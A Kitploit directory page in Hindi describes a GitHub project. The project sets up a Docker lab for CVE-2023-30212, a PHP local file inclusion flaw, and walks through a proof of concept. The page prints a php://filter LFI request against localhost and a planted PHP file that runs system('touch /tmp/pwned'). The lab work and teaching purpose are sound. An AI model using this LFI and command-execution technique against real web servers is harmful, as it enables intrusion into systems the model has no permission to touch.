Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/sungmin20/cve-2023-30212
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubsungmin20/cve-2023-30212

cve-2023-30212

Docker का उपयोग करके CVE-2023-30212 के लिए PoC

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2023-30212

Docker का उपयोग करके CVE-2023-30212 के लिए PoC

CVE-2023-30212 पर्यावरण सेटअप और PoC रिपोर्ट

📌 अवलोकन

यह रिपोर्ट Vulhub में उपलब्ध नहीं होने वाली CVE-2023-30212 कमज़ोरी के लिए Docker-आधारित कमज़ोर वेब पर्यावरण को स्वयं स्थापित करने और PoC के माध्यम से उस कमज़ोरी को सिद्ध करने का विवरण प्रस्तुत करती है।

  • CVE नंबर: CVE-2023-30212
  • कमज़ोरी का विवरण: PHP LFI (Local File Inclusion) के माध्यम से रिमोट कोड निष्पादन की संभावना
  • कठिनाई स्तर: उन्नत (Vulhub में उपलब्ध नहीं पर्यावरण की स्थापना)

🔧 पर्यावरण सेटअप

1. Dockerfile और docker-compose सेटअप

  • आधार इमेज: php:8.1-apache
  • /var/www/html निर्देशिका में vulnerable.php और malicious.php कॉपी करें
  • पोर्ट 8088 पर बाहरी पहुँच संभव डॉकर बिल्ड

2. मुख्य फ़ाइलों का विवरण

फ़ाइल नामविवरण
vulnerable.phpLFI कमज़ोरी वाली PHP फ़ाइल
malicious.phpसिस्टम कमांड निष्पादित करने वाली दुर्भावनापूर्ण PHP फ़ाइल
docker-compose.ymlकंटेनर सेटअप के लिए कॉन्फ़िगरेशन फ़ाइल
Dockerfileडॉकर इमेज बनाने के लिए कॉन्फ़िगरेशन फ़ाइल
image image image image ---

🚀 कमज़ोरी निष्पादन प्रवाह (PoC)

1. कंटेनर चलाना

root@kitploit:~
docker-compose up -d

कंटेनर का नाम: cve-2023-30212-cve-lfi-1

Apache सर्वर चालू होता है तथा http://localhost:8088 पर पहुँच संभव है

  1. LFI-आधारित दुर्भावनापूर्ण फ़ाइल स्रोत की पुष्टि नीचे दिए गए URL को कॉल करके malicious.php की सामग्री को base64 एन्कोडेड रूप में जाँचें:
root@kitploit:~
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
base64

आउटपुट को डिकोड करने पर नीचे दिया गया PHP कोड दिखाई देता है:

root@kitploit:~
<?php system("touch /tmp/pwned"); ?>
image
  1. कमांड निष्पादन और परिणाम की पुष्टि नीचे दिए गए URL को कॉल करके वास्तव में कमांड निष्पादित करें:
root@kitploit:~
http://localhost:8088/malicious.php

कमांड निष्पादित करने के बाद, /tmp/pwned फ़ाइल बन जानी चाहिए।

root@kitploit:~
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp

यदि परिणाम में pwned फ़ाइल मौजूद है, तो सफलता।

pwned फ़ाइल

परिणाम सारांश

php://filter-आधारित LFI कमज़ोरी के माध्यम से दुर्भावनापूर्ण फ़ाइल की सामग्री की पुष्टि और डिकोडिंग सफल रही

system() फ़ंक्शन युक्त दुर्भावनापूर्ण PHP कॉल के माध्यम से मनमाने कमांड निष्पादित करने में सफलता

/tmp/pwned फ़ाइल बनने के साथ PoC सत्यापन पूर्ण

टूल डाउनलोड करें